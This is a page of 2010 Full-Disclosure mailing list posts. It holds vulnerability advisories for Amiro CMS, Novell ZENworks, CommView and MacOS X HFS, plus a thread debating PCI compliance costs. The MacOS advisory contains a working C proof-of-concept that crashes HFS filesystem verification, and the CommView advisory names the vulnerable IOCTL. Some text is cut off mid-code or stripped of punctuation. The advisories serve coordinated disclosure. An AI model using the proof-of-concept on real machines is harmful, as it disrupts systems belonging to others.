[Full-disclosure] Amiro CMS=5.4.4 PHP injectio n
[ONSEC-09-026] Amiro CMS PHP inj [CVE number requested] Objective: Amiro CMS = 5.4.4 Type: PHP injection Threat: Medium Discovery date: 29.12.2009 Date of notification Developer: 29.12.2009 Released correction: 03/05/2010 Author: Vladimir Vorontsov OnSec Russian Security Group (onsec [dot] ru) Description: A vulnerability opens the way to overwrite and create arbitrary files on the target system. An attacker can affect the data falling into the file by changing some parameters in the administrative console. Also, due to lack of filtration attacker can specify an arbitrary file name and path, using the relative definition. The most dangerous is the creation of an executable file interpreter, which leads to the execution of arbitrary commands. For operation, a user account access to the module Data Sharing in the administrative console. The vulnerability exists due to lack of filtration in the name and file type in the module Data Sharing. original at russian: http://onsec.ru/vuln?id=21 -- Best regards, Vladimir Vorontsov ONsec security expert ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CVE or SUN bug number for http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html
Check CVE-2010-1423 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1423 Juha-Matti Lode, Nilss [nilss.l...@siemens.com] kirjoitti: Hello, I was trying to track the securty problem outlined in the following article: http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html Is a CVE and / or SUN bug number available ? I need this to determine when a solution is available. With best regards, Nilss Lode Siemens AG Corporate Technology CT T DE IT 1 Otto-Hahn-Ring 6 80200 Munich, Germany Tel.: +49 (89) 636-41267 Fax: +49 (89) 636-41166 Mobile: +49 (173) 7068828 mailto:nilss.l...@siemens.com http://www.siemens.com/cert Siemens Aktiengesellschaft: Chairman of the Supervisory Board: Gerhard Cromme; Managing Board: Peter Loescher, Chairman, President and Chief Executive Officer; Wolfgang Dehen, Heinrich Hiesinger, Joe Kaeser, Barbara Kux, Hermann Requardt, Siegfried Russwurm, Peter Y. Solmssen; Registered offices: Berlin and Munich, Germany; Commercial registries: Berlin Charlottenburg, HRB 12300, Munich, HRB 6684; WEEE-Reg.-No. DE 23691322 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.04.2010
- - Pub.: 23.04.2010
CVE: CVE-2010-0105
Risk: Medium
Affected Software:
- - MacOS 10.6 (tested on 1062 and 1063)
NOTE: Prior versions may also be affected.
Orginal URL:
http://securityreason.com/achievement_securityalert/83
- --- 0.Description ---
Mac OS is the trademarked name for a series of graphical user
interface-based operating systems developed by Apple Inc. (formerly
Apple Computer, Inc.) for their Macintosh line of computer systems. The
Macintosh user experience is credited with popularizing the graphical
user interface. The original form of what Apple would later name the
Mac OS was the integral and unnamed system software first introduced
in 1984 with the original Macintosh, usually referred to simply as the
System software.
- --- 1. MacOS X 10.6.3 filesystem hfs Denial of Service ---
The main problem exist in implementation of filesystem (hfs). MacOS X
10.6.3 has default hfs filesystem, so the problem came, when we create a
special structure with hardlinks.
Interesting information is in wikipedia :
http://en.wikipedia.org/wiki/Hard_link
- ---
...
Most modern operating systems don't allow hard links on directories to
prevent endless recursion. A notable exception to this is Mac OS X v10.5
(Leopard) which uses hard links on directories for the Time Machine
backup mechanism only.
...
- ---
In 10.6 we can't use ln(1) command to create hardlink to directory
(example: # ln C/C CX ). Anyway, we can use link(3) function and we
don't need any special privileges! It hear nice to exploit it.. let's try
To show this issue, we need use this program:
( http://securityreason.com/achievement_exploitalert/15 )
- --- hfs_poc.c ---
/* Proof of Concept for CVE-2010-0105
MacOS X 10.6 hfs file system attack (Denial of Service)
by Maksymilian Arciemowicz from SecurityReason.com
http://securityreason.com/achievement_exploitalert/15
NOTE:
This DoS will be localized in phase
Checking multi-linked directories
So we need activate it with line
connlink(C/C,CX);
Now we need create PATH_MAX/2 directory tree to make overflow.
and we should get diskutil and fsck_hfs exit with sig=8
~ x$ diskutil verifyVolume /Volumes/max2
Started filesystem verification on disk0s3 max2
Performing live verification
Checking Journaled HFS Plus volume
Checking extents overflow file
Checking catalog file
Checking multi-linked files
Checking catalog hierarchy
Checking extended attributes file
Checking multi-linked directories
Maximum nesting of folders and directory hard links reached
The volume max2 could not be verified completely
Error: -9957: Filesystem verify or repair failed
Underlying error: 8: POSIX reports: Exec format error
*/
#include stdio.h
#include unistd.h
#include stdlib.h
#include string.h
#include sys/param.h
#include sys/stat.h
#include sys/types.h
int createdir(char *name){
if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) ~umask(0))| S_IWUSR
|S_IXUSR)){
printf(Can`t create %s, name);
exit(1);}
else
return 0;
}
int comein(char *name){
if(0!=chdir(name)){
printf(Can`t chdir in to %s, name);
exit(1);}
else
return 0;
}
int connlink(a,b)
char *a,*b;
{
if(0!=link(a,b)){
printf(Can`t create link %s = %s,a,b);
exit(1);}
else
return 0;
}
int main(int argc,char *argv[]){
int level;
FILE *fp;
if(argc==2) {
level=atoi(argv[1]);
}else{
level=512; //default
}
createdir(C); //create hardlink
createdir(C/C); //create hardlink
connlink(C/C,CX); //we need use to checking multi-linked directorie
comein(C);
while(level--)
printf(Level: %i mkdir:%i chdir:%i\n,level,
createdir(C),
comein(C));
printf(check diskutil verifyVolume /\n);
return 0;
}
- --- hfs_poc.c ---
or use
- --- last.c ---
#include stdio.h
#include unistd.h
#include stdlib.h
#include string.h
#include sys/param.h
#include sys/stat.h
#include sys/types.h
#include err.h
#include errno.h
#include locale.h
/* function mkpath() from mkdir(1)/netbsd
* Copyright for mkdir.c (c) 1983, 1992, 1993
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.comwrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Their conclusions are based, IMO, on a flawed methodology. With some conservative assumptions, the paper indicates that companies actually spend 50% of their budget protecting secrets versus 20% on complying with external regulations. I wrote up a more thorough response which I'll post in a few days when I've proof-read it some more. On Thu, Apr 22, 2010 at 4:48 PM, Christopher Gilbert mot...@gmail.com wrote: The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don't know why people get all emotional about it and throw up their hands with all the this is wasted money positioning - it's not wasted at all; it is simply part of the cost of doing business in that market. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher Gilbert Sent: Thursday, April 22, 2010 4:48 PM To: Mike Hale Cc: full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.commailto:eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don’t know why people get all emotional about it and throw up their hands with all the “this is wasted money” positioning – it’s not wasted at all; it is simply part of the cost of doing business in that market. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christopher Gilbert *Sent:* Thursday, April 22, 2010 4:48 PM *To:* Mike Hale *Cc:* full-disclosure; security-bas...@securityfocus.com *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-078 April 23, 2010 -- Affected Vendors: Novell -- Affected Products: Novell Zenworks -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9715. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENworks. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ZENworks Server (zenserver.exe). This Tomcat server listens by default on TCP ports 80 and 443. The vulnerability exists in the UploadServlet. Using the UploadServlet an attacker can upload a malicious file outside of the TEMP directory on the server. By accessing this uploaded file remotely it is executed in the context of the zenserver.exe process. This can be exploited to gain arbitrary code execution in the context of the user running the ZENworks server. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/viewContent.do?externalId=7005573 -- Disclosure Timeline: 2010-02-09 - Vulnerability reported to vendor 2010-04-23 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Stephen Fewer of Harmony Security (www.harmonysecurity.com) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
How can you say it is wasted? It doesn't matter if you are a fan of it or not, in the same way that it doesn't matter if you are a fan of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is wasted money, and might bring into question the value of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can't handle credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can self audit. If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don't like PCI, then don't process credit cards, or come up with your own. I still don't really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don't know why people get all emotional about it and throw up their hands with all the this is wasted money positioning - it's not wasted at all; it is simply part of the cost of doing business in that market. t From: full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.ukmailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher Gilbert Sent: Thursday, April 22, 2010 4:48 PM To: Mike Hale Cc: full-disclosure; security-bas...@securityfocus.commailto:security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.commailto:eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it or not, in the same way that it doesn’t matter if you are a “fan” of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is “wasted money,” and might bring into question the “value” of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can’t “handle” credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can “self audit.” If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don’t like PCI, then don’t process credit cards, or come up with your own. I still don’t really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don’t know why people get all emotional about it and throw up their hands with all the “this is wasted money” positioning – it’s not wasted at all; it is simply part of the cost of doing business in that market. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher Gilbert Sent: Thursday, April 22, 2010 4:48 PM To: Mike Hale Cc: full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. So what's the problem? .. if you have done it according to (or exceeding) the spec .. check the box, buy a box of donuts for the auditor .. let them look it over, and be done with it. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. If VISA (et.al.) could define real security and write it down, they would. What is real security exactly? .. I'd argue the only secure computer is one that's still sealed in the factory carton. Break the seal, game over .. just like it says on a box of Band-Aids Sterility guaranteed until opened. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. The thinking goes .. that if you implement the PCI standards and aim to actually do as it suggests (meaning doing what the documents suggests *correctly* .. not just having a blinkinlight in place so you can check a box) .. you're already down the right path. Even so .. the problem with securing networks/systems is there's millions of them and only a few of you. Also .. you have to be right 100% of the time, and they only have to get lucky once. My $10.02 ($10 minimum purchase on all credit cards). ** Cheers, Michael Holstein Cleveland State University ** : yes, I know this goes against the merchant agreement .. sarcasm. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Three things: 1) I am one of those people, as many of us are. 2) I disagree - compliance with the standard, as put forth by the body developing the standard, certainly implies a real security benefit. Does PCI=Security? No, but it certainly helps. There is a huge difference between ensure and imply. Using them together like that as if they are synonymous is a red herring. Think about what you just said: it doesn't imply real security. THAT doesn't define ANYTHING actionable. Nothing. What the standard does IS to define at least measures to be taken that can increase security - it has specifics and action items. It is tangible. And, it is far more likely to provide a real benefit than not. It *certainly* does more than having some policy say You must imply real security. If you are one of those people that care about security, and if your takeaway from PCI is that it doesn't imply real security but you fail to tell us what does, then I would have to say you are not really providing any benefit. 3) Apparently not a cost of doing business how? What did I say that makes that statement apparent? I fail to see how you can connect what the OP stated as Compliance is Wasted Money with apparently having a secure network is not a cost of doing business. They are two different things. If you want to process credit cards in your business to make more money, and the credit card industry says, up front, ok, you can play if you follow these rules, then that is a cost of doing business. If you actually do enough business to justify PCI audits, and you as a security person implement a system that passes all PCI audit requirements as written, but still FAIL to have a system where no security is implied, then YOU have not done your job. No amount a blaming PCI's inadequacies is going to make up for people not taking responsibility for doing their jobs. Period. t -Original Message- From: Stephen Mullins [mailto:steve.mullins.w...@gmail.com] Sent: Friday, April 23, 2010 10:40 AM To: Thor (Hammer of God) Cc: Christian Sciberras; security-bas...@securityfocus.com; full-disclosure Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is wasted? It doesn't matter if you are a fan of it or not, in the same way that it doesn't matter if you are a fan of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is wasted money, and might bring into question the value of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can't handle credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can self audit. If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don't like PCI, then don't process credit cards, or come up with your own. I still don't really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God)
[Full-disclosure] [CORELAN-10-30] - CommView Network Monitor And Analyzer v6.1 b644 - cv2k1.sys DoS (BSOD)
|--|
| __ __ |
| _ / /___ _ / / _ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| secur...@corelan.be |
| |
|-[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|--|
Advisory : CORELAN-10-030
Disclosure date : April 23rd, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030
0x00 : Vulnerability information
Product : CommView Network Monitor And Analyzer
Version : CommView 6.1 before Build 644
Vendor : http://www.tamos.com/
URL : http://www.tamos.com/download/main/
Type of vulnerability : Local Denial Of Service - BSOD
Risk rating : Low
Issue fixed in version : CommView 6.1 Build 644
Vulnerability discovered by : p4r4noid (T.B)
Greetings to : Corelan Security Team
(http://www.corelan.be:8800/index.php/security/corelan-team-members/)
0x01 : Vendor description of software
From the vendor website:
CommView is a powerful network monitor and analyzer designed for LAN
administrators, security professionals, network programmers, home
users...virtually anyone who wants a full picture of the traffic flowing
through a PC or LAN segment.
Loaded with many user-friendly features, CommView combines performance and
flexibility with an ease of use unmatched in the industry.
Price information
Home: $149.00
0x02 : Vulnerability details
Local Denial Of Service:
When the CommView application is installed on a host cv2k1.sys driver is loaded
on the machine.
This driver allows any unprivileged user to open the device .CV2K_{GUID} and
issue IOCTLs (0x2578) with a buffering mode of METHOD_BUFFERED without any
kind of validation.
The cv2k1.sys driver uses the METHOD_BUFFERED communication method when
handling IOCTLs request and does not validate properly the buffer sent in the
Irp object allowing local unprivileged attackers to crash an affected system,
creating a denial of service condition.
Affected Device: cv2k1.sys (DeviceCV2K_{GUID})
Affected IOCTL: 0x2578
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (108e).
Method: METHOD_BUFFERED
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may
be wrong.
f58e5c18 84b05e30 84aeeca8 8605e690 84b05ea0 cv2k1+0x1faa
f58e5c34 804e3d77 84ba5038 2578 806ee2d0 0x84b05e30
f58e5c44 8056a9ab 84b05ea0 860cbb08 84b05e30 nt!IopfCallDriver+0x31
f58e5c58 8057d9f7 84ba5038 84b05e30 860cbb08
nt!IopSynchronousServiceTail+0x60
f58e5d00 8057fbfa 07b8 nt!IopXxxControlFile+0x611
f58e5d34 804df06b 07b8
nt!NtDeviceIoControlFile+0x2a
f58e5d34 7c90eb94 07b8 nt!KiFastCallEntry+0xf8
0012ff00 0x7c90eb94
IOCTL example:
InBuff: 0x8001, InSize: 0x
OutBuff: 0x8002, OutSize: 0x
0x03 : Vendor communication
18th Nov, 2009 : Vendor contacted
11th Apr, 2010 : Fixed Build Published
23rd Apr, 2010 : Public Disclosure
0x04 : Exploit/PoC
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Look at the PCI requirements. What's unreasonable about them? Which portions are *NOT* part of having a secure network? If you strive for security, and weave that into your network, complying with PCI should be cake. On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins steve.mullins.w...@gmail.com wrote: I don't see what the hubbub is Some people in the information security industry actually care about securing systems and the information they contain rather than filling in check boxes. Compliance may ensure a minimum standard is met, but it does not ensure or imply that real security is being maintained at an organization. As you say, PCI has become a cost of doing business whereas having a secure network is apparently not a cost of doing business. This is a problem. Crazy notion, I know. On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it or not, in the same way that it doesn’t matter if you are a “fan” of the 4% surcharge retail establishments pay to accept the credit card as payment. Using your logic, you would way it is “wasted money,” and might bring into question the “value” of the surcharge, etc. It is simply a cost of doing business. If you choose to offload processing to a payment gateway, then that will also incur a cost. Depending on your volume, that cost may or may not be higher than you processing them yourself while complying to standards. The implementation of actual security measures will be different. But you can’t “handle” credit cards in the classic sense of the word without complying with PCI. If you pass along the transaction to a gateway, you are not handling it. If you DO handle it, then you have to comply with PCI. If you process less than 1 million transactions a year, you can “self audit.” If you process more, you have to be audit by a PCI auditor. None of this MEANS you are secure, it means you comply. If you don’t like PCI, then don’t process credit cards, or come up with your own. I still don’t really see what all the hubbub is about here. t From: Christian Sciberras [mailto:uuf6...@gmail.com] Sent: Friday, April 23, 2010 9:29 AM To: Thor (Hammer of God) Cc: Christopher Gilbert; Mike Hale; full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds it is simply part of the cost of doing business in that market. A.k.a. wasted money. Truth be told, I'm no fan of PCI. Other companies get the same functionality (accept the storage of credit cards) without worrying about PCI/DSS (e.g. through Payment Gateways). In the end, as a service, what do I want, an inventory of credit cards, or a stable payment system? The later I guess. As to security, it totally depends on implementation; one can handle credit cards without the need of standards compliance. My two cents. Regards, Christian Sciberras. On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Another thing that I think people fail to keep in mind is that when it comes to PCI, it is part of a contractual agreement between the entity and card facility they are working with. If a business wants to accept credit cards as a means of payment (based on volume) then part of their agreement is that they must undergo compliance to a standard implemented by the industry. I don’t know why people get all emotional about it and throw up their hands with all the “this is wasted money” positioning – it’s not wasted at all; it is simply part of the cost of doing business in that market. t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher Gilbert Sent: Thursday, April 22, 2010 4:48 PM To: Mike Hale Cc: full-disclosure; security-bas...@securityfocus.com Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds The paper concludes that companies are underinvesting in--or improperly prioritizing--the protection of their secrets. Nowhere does it state that the money spent on compliance is money wasted. On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com wrote: I find the findings completely flawed. Am I missing something? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Referer for DataLife Engine
